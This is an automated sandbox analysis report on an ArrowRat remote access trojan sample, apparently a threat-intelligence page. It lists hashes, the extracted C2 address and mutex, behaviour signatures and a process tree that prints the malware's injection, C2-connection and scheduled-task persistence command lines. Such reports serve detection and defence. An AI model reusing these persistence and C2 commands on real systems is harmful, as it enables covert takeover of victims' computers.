Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 11:28

General

  • Target

    a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe

  • Size

    732KB

  • MD5

    ab0d49fdafb94d853b64632422636c97

  • SHA1

    114878c7437c44b9d33085f3f75ca16f4e3aa9dc

  • SHA256

    a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b

  • SHA512

    d358354275e32cdb8526687f9e27ef3d419d5ed2449d22f1b9230dbce92aed8bade6d2b5d45b3504336b76a8718af782c9ef78e42b3a0fb8a5428e41a99a529a

  • SSDEEP

    12288:VD9TFmMwfrck/YEwEVhftq6rmIGD9P5X5U4LVkYdS7Ffi:KgERVNQ6Fq9hX5U4L94Zi

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

vncnew1984.duckdns.org:1984

Mutex

ecZCILAfG

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry class 36 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe
    "C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:100
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:1252
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4312
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\kio"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3692
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4148
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1072
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:924
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2472
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4492
  • C:\Users\Admin\AppData\Roaming\kio\kio.exe
    C:\Users\Admin\AppData\Roaming\kio\kio.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:924
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies registry class
        PID:3064
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4564
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\kio"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4660
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4616
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c copy "C:\Users\Admin\AppData\Roaming\kio\kio.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4348
  • C:\Users\Admin\AppData\Roaming\kio\kio.exe
    C:\Users\Admin\AppData\Roaming\kio\kio.exe
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    PID:2016

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kio.exe.log

    Filesize

    1KB

    MD5

    c1e2960afcfc38deeb25781bab99faf2

    SHA1

    f7af0c85d203333ae5ac292d443a675d88008fe8

    SHA256

    742d6cff0910b1c9de9bc5406e6caec19c8cc462b28c5e9eafea28dd01624f3a

    SHA512

    3c88c4118148f651d5e424f14079fb95d1109e3f34a26ff06e933adaaaee442b88cbded64cf9259645e104a02d83a7bac5f437297e0ea5ea989771069bf685cd

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133716509429708837.txt

    Filesize

    75KB

    MD5

    3c988032b8f3c2e23631f4373bb52065

    SHA1

    89689fa485aa1f0f75fb85c7a373f0bf42f6a0fc

    SHA256

    d2b383ce6a790cc58ca1d6bb0caafb38acff91b0cdb386b7379906facbc5102b

    SHA512

    b3f5c9d69462c6cbc6e0e71dfb5bb7d6a3f5abda173e7ba43ed314fee43a22e31fd5983b33468da54bfad5a903624d907fb73d5c88b67b3fd7daed3a0b9852c3

  • C:\Users\Admin\AppData\Local\Temp\TMP_pass

    Filesize

    40KB

    MD5

    a182561a527f929489bf4b8f74f65cd7

    SHA1

    8cd6866594759711ea1836e86a5b7ca64ee8911f

    SHA256

    42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

    SHA512

    9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

  • C:\Users\Admin\AppData\Roaming\kio\kio.exe

    Filesize

    732KB

    MD5

    ab0d49fdafb94d853b64632422636c97

    SHA1

    114878c7437c44b9d33085f3f75ca16f4e3aa9dc

    SHA256

    a0ecd7e8709a733b5c07e102a850e5e626f04e997e5a125632df80a85944b58b

    SHA512

    d358354275e32cdb8526687f9e27ef3d419d5ed2449d22f1b9230dbce92aed8bade6d2b5d45b3504336b76a8718af782c9ef78e42b3a0fb8a5428e41a99a529a

  • memory/100-5-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/100-14-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/100-6-0x0000000005EB0000-0x0000000005EBA000-memory.dmp

    Filesize

    40KB

  • memory/100-7-0x0000000074CCE000-0x0000000074CCF000-memory.dmp

    Filesize

    4KB

  • memory/100-8-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/100-1-0x0000000000F20000-0x0000000000FDC000-memory.dmp

    Filesize

    752KB

  • memory/100-2-0x0000000005F90000-0x0000000006534000-memory.dmp

    Filesize

    5.6MB

  • memory/100-3-0x0000000005A80000-0x0000000005B12000-memory.dmp

    Filesize

    584KB

  • memory/100-0-0x0000000074CCE000-0x0000000074CCF000-memory.dmp

    Filesize

    4KB

  • memory/100-4-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/1252-23-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

    Filesize

    4KB

  • memory/1812-176-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/1812-15-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/1812-11-0x0000000005270000-0x000000000530C000-memory.dmp

    Filesize

    624KB

  • memory/1812-10-0x0000000074CC0000-0x0000000075470000-memory.dmp

    Filesize

    7.7MB

  • memory/1812-9-0x0000000000400000-0x0000000000460000-memory.dmp

    Filesize

    384KB

  • memory/4312-13-0x0000000000400000-0x0000000000416000-memory.dmp

    Filesize

    88KB

  • memory/4312-20-0x00000000062E0000-0x0000000006330000-memory.dmp

    Filesize

    320KB

  • memory/4492-60-0x000001EC6F6C0000-0x000001EC6F6E0000-memory.dmp

    Filesize

    128KB

  • memory/4492-44-0x000001EC6F0A0000-0x000001EC6F0C0000-memory.dmp

    Filesize

    128KB

  • memory/4492-30-0x000001EC6F0E0000-0x000001EC6F100000-memory.dmp

    Filesize

    128KB

  • memory/4492-26-0x000001EC6E200000-0x000001EC6E300000-memory.dmp

    Filesize

    1024KB

  • memory/4860-179-0x00000000003F0000-0x00000000004AC000-memory.dmp

    Filesize

    752KB